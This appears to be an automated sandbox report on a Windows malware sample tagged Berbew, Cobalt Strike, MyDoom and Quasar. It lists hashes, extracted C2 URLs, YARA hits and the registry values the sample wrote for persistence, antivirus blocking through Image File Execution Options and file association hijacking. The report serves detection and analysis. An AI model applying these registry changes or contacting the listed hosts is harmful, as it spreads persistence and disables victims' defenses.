berbew | 69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
19-09-2024 06:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
Size

10.2MB
MD5

cb15c5a967ef9f97520336419ba91964
SHA1

7fc921d591e357108c64da40f8646841517cbc91
SHA256

69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591
SHA512

f692a0f845a2be87ae06b8bce8553c9b8061f9e9e2a9a60bca5ff603f11d4a09edf16c3023a717878ca4d528e586c192aa669f5cb7f21a4e301fe23382b16a62
SSDEEP

196608:zJxxbGXkwODPzMsVerPYVnN/SMFm0ICteEroXxRzlxZV3Gu5D4S26cSEqCS3JUl5:jxZgPYVnNSMhInEroX714S2IlpUlNWax

Score

10^/10

berbew cobaltstrike mydoom quasar aspackv2 backdoor discovery evasion execution macro persistence pyinstaller ransomware spyware trojan upx worm xlm

Malware Config

Extracted

Family

berbew

http://f/wcmd.htm

http://f/ppslog.php

http://f/piplog.php?%s:%i:%i:%s:%09u:%i:%02d:%02d:%02d

http://viruslist.com/wcmd.txt

http://viruslist.com/ppslog.php

http://viruslist.com/piplog.php?%s:%i:%i:%s:%09u:%i:%02d:%02d:%02d

http://crutop.nu/index.php

http://crutop.ru/index.php

http://mazafaka.ru/index.php

http://color-bank.ru/index.php

http://asechka.ru/index.php

http://trojan.ru/index.php

http://fuck.ru/index.php

http://goldensand.ru/index.php

http://filesearch.ru/index.php

http://devx.nm.ru/index.php

http://ros-neftbank.ru/index.php

http://lovingod.host.sk/index.php

http://www.redline.ru/index.php

http://cvv.ru/index.php

Signatures

Berbew
Berbew is a backdoor written in C++.
backdoor berbew

Cobalt Strike reflective loader 1 IoCs

Detects the reflective loader used by Cobalt Strike.

resource	yara_rule
behavioral2/files/0x00070000000236ee-1905.dat	cobalt_reflective_dll

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike

Detects MyDoom family 1 IoCs

resource	yara_rule
behavioral2/memory/996-478-0x0000000000500000-0x0000000000510200-memory.dmp	family_mydoom

Modifies WinLogon for persistence 2 TTPs 4 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe \"C:\\Windows\\system32\\K0L4B0R451.exe\""	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\K0L4B0R451.exe"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe \"C:\\Windows\\system32\\K0L4B0R451.exe\""	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\K0L4B0R451.exe"	winlogon.exe

Modifies visibility of file extensions in Explorer 2 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	240919-hn6jmswcldb34dcf7cb49490197ff10b28deeebcb734cefece1173b2c8fbbb22c41a62acdcN.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	winlogon.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe

MyDoom
MyDoom is a Worm that is written in C++.
worm mydoom
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000024671-23862.dat	family_quasar
behavioral2/files/0x0007000000024c25-29658.dat	family_quasar

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"	winlogon.exe

Disables RegEdit via registry modification 4 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	winlogon.exe

Disables Task Manager via registry modification
evasion

Disables cmd.exe use via registry modification 4 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	winlogon.exe

Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger = "notepad.exe"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Avgnt.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CClaw.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Niu.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Nvcoas.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger = "cmd.exe /c del"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnt.exe	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Niu.exe\Debugger = "cmd.exe /c del"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Zanda.exe	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SMP.exe\Debugger = "cmd.exe /c del"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SMP.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Nip.exe\Debugger = "cmd.exe /c del"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup32.exe\Debugger = "notepad.exe"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger = "cmd.exe /c del"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-SE.exe	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-SE.exe\Debugger = "cmd.exe /c del"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Niu.exe	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Njeeves.exe	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger = "cmd.exe /c del"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger = "cmd.exe /c del"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Avgw.exe\Debugger = "cmd.exe /c del"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger = "cmd.exe /c del"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Njeeves.exe\Debugger = "cmd.exe /c del"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Nip.exe	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Nipsvc.exe\Debugger = "cmd.exe /c del"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Avguard.exe\Debugger = "cmd.exe /c del"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Njeeves.exe\Debugger = "cmd.exe /c del"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Zanda.exe\Debugger = "cmd.exe /c del"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Zlh.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger = "cmd.exe /c del"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe\Debugger = "cmd.exe /c del"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Nvcoas.exe\Debugger = "cmd.exe /c del"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Nipsvc.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger = "cmd.exe /c del"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnt.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Avguard.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup32.exe\Debugger = "notepad.exe"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CClaw.exe	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CClaw.exe\Debugger = "cmd.exe /c del"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Zlh.exe\Debugger = "cmd.exe /c del"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe\Debugger = "cmd.exe /c del"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Nvccf.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Avgnt.exe	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Nipsvc.exe\Debugger = "cmd.exe /c del"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger = "notepad.exe"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Zanda.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger = "notepad.exe"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CClaw.exe\Debugger = "cmd.exe /c del"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SMP.exe	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Avgw.exe	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Nipsvc.exe	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Zanda.exe\Debugger = "cmd.exe /c del"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Avgw.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-SE.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe

Suspicious Office macro 1 IoCs

Office document equipped with 4.0 macros.

macro xlm

resource	yara_rule
behavioral2/files/0x0007000000023fbd-23461.dat	office_xlm_macros

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0007000000023fcb-20476.dat	acprotect

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x000800000002381a-3120.dat	aspack_v212_v242

Executes dropped EXE 4 IoCs

pid	Process
2636	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
2388	240919-hn6jmswcldb34dcf7cb49490197ff10b28deeebcb734cefece1173b2c8fbbb22c41a62acdcN.exe
3356	winlogon.exe
4964	240919-hnkbeawejpeacbd21b64ff72559ab5eedcd804cf3b_JaffaCakes118.exe

Loads dropped DLL 20 IoCs

pid	Process
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe

Modifies system executable filetype association 2 TTPs 26 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "K0L4B0R451 File"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "K0L4B0R451 File"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\NeverShowExt = "1"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\NeverShowExt = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/996-478-0x0000000000500000-0x0000000000510200-memory.dmp	upx
behavioral2/memory/2192-480-0x0000000000400000-0x0000000000408000-memory.dmp	upx
behavioral2/memory/2192-571-0x0000000000400000-0x0000000000408000-memory.dmp	upx
behavioral2/memory/2192-1568-0x0000000000400000-0x0000000000408000-memory.dmp	upx
behavioral2/files/0x000700000002352b-1580.dat	upx
behavioral2/files/0x00070000000236ee-1905.dat	upx
behavioral2/files/0x00070000000238a8-3478.dat	upx
behavioral2/files/0x0007000000023fcb-20476.dat	upx
behavioral2/files/0x000800000002491d-29286.dat	upx
behavioral2/files/0x0007000000024bdf-29388.dat	upx

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Revenger = "C:\\Windows\\system32\\K0L4B0R451.exe"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Winlogon = "C:\\Windows\\system32\\~A~m~B~u~R~a~D~u~L~\\winlogon.exe"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Revenger = "C:\\Windows\\system32\\K0L4B0R451.exe"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Winlogon = "C:\\Windows\\system32\\~A~m~B~u~R~a~D~u~L~\\winlogon.exe"	winlogon.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"	winlogon.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

